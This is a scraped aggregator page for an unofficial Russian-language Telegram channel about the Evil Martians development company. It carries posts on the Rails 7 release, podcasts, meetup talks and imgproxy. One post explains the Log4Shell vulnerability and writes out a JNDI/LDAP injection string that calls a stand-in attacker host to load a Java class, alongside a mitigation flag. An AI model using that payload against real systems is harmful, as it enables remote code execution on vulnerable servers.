Получи случайную криптовалюту за регистрацию!

Evil Martians

Логотип телеграм канала @evilmartians — Evil Martians E
Логотип телеграм канала @evilmartians — Evil Martians
Адрес канала: @evilmartians
Категории: Технологии
Язык: Русский
Количество подписчиков: 3.55K
Описание канала:

Канал Злых марсиан (https://evilmartians.com), неофициальный. Твиттер: https://twitter.com/evilmartians_ru
Стартапы, веб-разработка, интернет-бизнес, UI дизайн, бэкенд (#ruby #rails #golang #rust), фронтенд (#javascript), #ios, #devops (#kubernetes)

Рейтинги и Отзывы

2.67

3 отзыва

Оценить канал evilmartians и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

1

4 звезд

0

3 звезд

0

2 звезд

1

1 звезд

1


Последние сообщения 4

2021-12-17 18:50:08 Сергей Александрович, автор imgproxy, побывал в гостях у подкаста Remote Talk. Поговорили об imgproxy и open source в целом, обстановке в мире Go и выборе технологий на проектах Злых Марсиан.

YouTube: http://amp.gs/jt7Uu

Аудио: http://amp.gs/jt7U0
968 views15:50
Открыть/Комментировать
2021-12-16 15:35:02 Вышла финальная версия Ruby on Rails 7.0!

Большое обновление, которому задолго до релиза пророчили революционную роль в веб-разработке — ведь по умолчанию работа с фронтендом теперь организована совсем по-новому (или слишком хорошо забытому старому) — без сборщиков и Node.js на разработческой машине. Современные веб-технологии (ESM, HTTP/2, import maps), а также рельсовое «ноу-хау» Hotwire (с Turbo и Stimulus под капотом и, кстати, мы про него уже написали пост у нас в блоге), позволяют разрабатывать современные интерфейсы без SPA и дополнительной сложности. Насколько такой подход «взлетит» и будет ли ренессанс рельсовых вьюх — это нам еще предстоит увидеть.

Ещё из значимого в этом релизе:
 • шифрованные атрибуты в БД «из коробки»
 • возможность делать несколько параллельных запросов к БД и продвинутое логирование этих запросов
 • управление кэшировем partials (caching? и uncacheable!)
 • и многое другое.

Минимальная версия Ruby теперь 2.7.

Ну а в полном ченджлоге, где есть изменения разной степени революционности, нашлось место и парочке небольших марсианских пулл-реквестов: #38957 Поддержка direct uploads к нескольким сервисам в Active Storage, #40491 Выражение FILTER (SQL:2003) в Arel, #41933 Улучшения upsert_all.

Читайте подробнее в анонсе у фреймворка в блоге и зацените новый веб-сайт проекта: rubyonrails.org.
1.6K views12:35
Открыть/Комментировать
2021-12-10 20:30:10 У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
1.5K views17:30
Открыть/Комментировать
2021-12-10 11:13:05 Неделю назад прошёл Saint P Ruby Winter 2021 meetup. Видео с него уже доступно на YouTube вместе с докладами марсиан!

Доклад Дмитрия Цепелева про мультиверсионность в базах данных начинается с 36:35, а доклад Андрея Новикова про индексы в них же — с 1:05:05.

Наслаждайтесь:



Вопросы по докладам не стесняйтесь спрашивать в чате питерского Ruby-сообщества @saintprug — авторы там есть и активно участвуют, хоть сами и не из Санкт-Петербурга.
1.8K views08:13
Открыть/Комментировать
2021-12-09 18:38:03
Рассказываем об одном из самых крутых мобильных кейсов Марсиан — о том, как в качестве технической команды с нуля создавали FEED, новую социальную сеть, в основе которой видео и только видео со множеством эффектов (и никакого текста!).

При работе над iOS приложением поработали с последними технологиями с мобильного фронта, включающими Swift, SwiftUI, Combine, Compositional Layout, Core ML, GraphQL, социальные механики и множество фич для встроенного видео-редактора.

http://amp.gs/jt8qx
1.1K views15:38
Открыть/Комментировать
2021-12-09 12:05:04 Злая Марсианка Вика Мельникова обсудила тонкости найма команды продуктовой разработки на подкасте #TechForNonTechies с Софией Матвеевой. Автор подкаста — ментор и создатель Enty, в разработке которого нам довелось поучаствовать.

http://amp.gs/jtjfg
1.4K views09:05
Открыть/Комментировать
2021-12-08 15:51:15 Авторы Macaw, Swift-библиотеки для работы с SVG, подарили миру Apple-разработчиков SVGView — парсер и рендерер SVG-файлов на SwiftUI.

http://amp.gs/jYb73
967 views12:51
Открыть/Комментировать
2021-12-08 14:57:06 В поисках жизни в Солнечной системе лаборатория NASA Jet Propulsion Labs использует платформу Labelbox и ее machine learning-алгоритмы. А эту платформу, в свою очередь, поддерживают инструменты, один из которых — наш марсианский продукт imgproxy Pro.

Злые Марсиане ищут добрых, получается.

http://amp.gs/jYbZ6
1.1K views11:57
Открыть/Комментировать
2021-12-07 17:41:05 Вышел первый релиз-кандидат Ruby on Rails 7.0 ( )

В комплекте:
 • новый подход к работе с JS: можно совсем без сборщиков, используя ESM, Hotwire, Turbo, а можно со сборщиком, причём на выбор: esbuild, rollup.js или Webpack. И CSS-фреймворк можно выбрать (PostCSS, Tailwind CSS и другие).
 • шифрованные атрибуты в БД «из коробки»
 • возможность делать несколько параллельных запросов к БД и продвинутое логирование этих запросов
 • и многое другое.

Кстати, в ченджлоге есть даже парочка марсианских пулл-реквестов: #38957 Поддержка direct uploads к нескольким сервисам в Active Storage и #40491 Выражение FILTER (SQL:2003) в Arel.

Подробнее у фреймворка в блоге: weblog.rubyonrails.org/2021/12/6/Rails-7-0-rc-1-released
1.3K views14:41
Открыть/Комментировать
2021-12-06 11:32:05 Интересные мысли о настоящем и будущем программирования от Алана Кея — автора Smalltalk, одного из изобретателей ООП и GUI и вообще живой легенды:



1.2K views08:32
Открыть/Комментировать